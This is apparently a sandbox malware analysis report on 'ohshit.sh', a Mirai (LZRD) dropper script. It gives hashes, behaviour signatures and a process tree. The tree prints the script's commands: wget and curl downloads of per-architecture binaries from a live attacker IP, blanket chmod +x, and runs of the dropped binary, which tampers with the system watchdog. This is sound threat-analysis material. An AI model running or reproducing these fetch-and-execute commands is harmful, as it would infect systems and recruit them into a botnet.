Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
06-01-2025 06:46
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
bb9b02790d9369cfdce60911efa478c8
-
SHA1
cf899d0844a5cbac80784008dd7ff20ddc95ef8f
-
SHA256
8562b9fbc61584ce74c2f56847565faccf053134a8f4abf4aaee8e2ed82ccfc5
-
SHA512
55842a12c510f36d7c8d9f1b35bebf9729421d061f14b9cd1c895fab850087dc091b57a641faad012b785340edfeb5cb72b68abc22090e9cf3f842075bf0bb80
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1663 chmod 1647 chmod 1569 chmod 1609 chmod 1629 chmod 1655 chmod 1559 chmod 1543 chmod 1595 chmod 1639 chmod 1527 chmod 1535 chmod 1551 chmod 1583 chmod 1519 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1520 WTF /tmp/WTF 1528 WTF /tmp/WTF 1536 WTF /tmp/WTF 1544 WTF /tmp/WTF 1552 WTF /tmp/WTF 1560 WTF /tmp/WTF 1570 WTF /tmp/WTF 1584 WTF /tmp/WTF 1596 WTF /tmp/WTF 1610 WTF /tmp/WTF 1630 WTF /tmp/WTF 1640 WTF /tmp/WTF 1648 WTF /tmp/WTF 1656 WTF /tmp/WTF 1664 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1266/cmdline WTF File opened for reading /proc/1360/cmdline WTF File opened for reading /proc/1094/cmdline WTF File opened for reading /proc/1335/cmdline WTF File opened for reading /proc/1173/cmdline WTF File opened for reading /proc/1659/cmdline WTF File opened for reading /proc/1042/cmdline WTF File opened for reading /proc/1194/cmdline WTF File opened for reading /proc/682/cmdline WTF File opened for reading /proc/1641/cmdline WTF File opened for reading /proc/1152/cmdline WTF File opened for reading /proc/676/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/1537/cmdline WTF File opened for reading /proc/1531/cmdline WTF File opened for reading /proc/1631/cmdline WTF File opened for reading /proc/1090/cmdline WTF File opened for reading /proc/1042/cmdline WTF File opened for reading /proc/1143/cmdline WTF File opened for reading /proc/1090/cmdline WTF File opened for reading /proc/1505/cmdline WTF File opened for reading /proc/1181/cmdline WTF File opened for reading /proc/1036/cmdline WTF File opened for reading /proc/1360/cmdline WTF File opened for reading /proc/1651/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/1561/cmdline WTF File opened for reading /proc/545/cmdline WTF File opened for reading /proc/607/cmdline WTF File opened for reading /proc/1667/cmdline WTF File opened for reading /proc/708/cmdline WTF File opened for reading /proc/575/cmdline WTF File opened for reading /proc/1613/cmdline WTF File opened for reading /proc/1502/cmdline WTF File opened for reading /proc/607/cmdline WTF File opened for reading /proc/1200/cmdline WTF File opened for reading /proc/1202/cmdline WTF File opened for reading /proc/678/cmdline WTF File opened for reading /proc/1200/cmdline WTF File opened for reading /proc/1500/cmdline WTF File opened for reading /proc/545/cmdline WTF File opened for reading /proc/456/cmdline WTF File opened for reading /proc/1036/cmdline WTF File opened for reading /proc/1502/cmdline WTF File opened for reading /proc/1657/cmdline WTF File opened for reading /proc/1667/cmdline WTF File opened for reading /proc/1573/cmdline WTF File opened for reading /proc/1555/cmdline WTF File opened for reading /proc/1573/cmdline WTF File opened for reading /proc/1267/cmdline WTF File opened for reading /proc/1017/cmdline WTF File opened for reading /proc/1651/cmdline WTF File opened for reading /proc/1643/cmdline WTF File opened for reading /proc/1599/cmdline WTF File opened for reading /proc/450/cmdline WTF File opened for reading /proc/462/cmdline WTF File opened for reading /proc/1148/cmdline WTF File opened for reading /proc/969/cmdline WTF File opened for reading /proc/1139/cmdline WTF File opened for reading /proc/1665/cmdline WTF File opened for reading /proc/1309/cmdline WTF File opened for reading /proc/477/cmdline WTF File opened for reading /proc/1651/cmdline WTF File opened for reading /proc/606/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1525 curl 1524 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.arc curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1505 -
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1506
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/catcat wind.x862⤵PID:1518
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1520
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1524
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1525
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1528
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1532
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1536
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.i4682⤵PID:1540
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.i4682⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1544
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.i6862⤵PID:1548
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.i6862⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1552
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.x86_642⤵PID:1556
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.x86_642⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-ygCs6y systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1560
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1564
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1570
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1574
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1584
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1588
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-zVS6hH systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1596
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1600
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-dT6EqX systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1610
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1614
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-bolt.service-m00G0S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1630
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1634
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1640
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1644
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1648
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1652
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1656
-
-
/usr/bin/wgetwget http://154.216.17.34/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1660
-
-
/usr/bin/curlcurl -O http://154.216.17.34/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/chmodchmod +x config-err-9gUEVa netplan_dmdk49qg ohshit.sh snap-private-tmp ssh-bxVkkdE5R68S systemd-private-f7685a4919f54b5fac845b2fc536c21d-colord.service-cLyRvE systemd-private-f7685a4919f54b5fac845b2fc536c21d-ModemManager.service-63cCBY systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-resolved.service-E8c4rc systemd-private-f7685a4919f54b5fac845b2fc536c21d-systemd-timedated.service-7vq915 wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1664
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
25KB
MD5e802a5d2fc1758f633787e96999218c9
SHA1e3bea9702230370bd3a9b7b503aedaf6eb8a99f0
SHA256bedafc169492f127eddcab8a5eba9b7aa57acb0c43aa7b24ab4953331ed58b79
SHA5126fabbf929eed5db052fb111dcb8582549481d4114b12c153a989180a9a9a0b052fbb85687d36221d59b542d62a2173c945c4fba22b374ea79685df09be727df8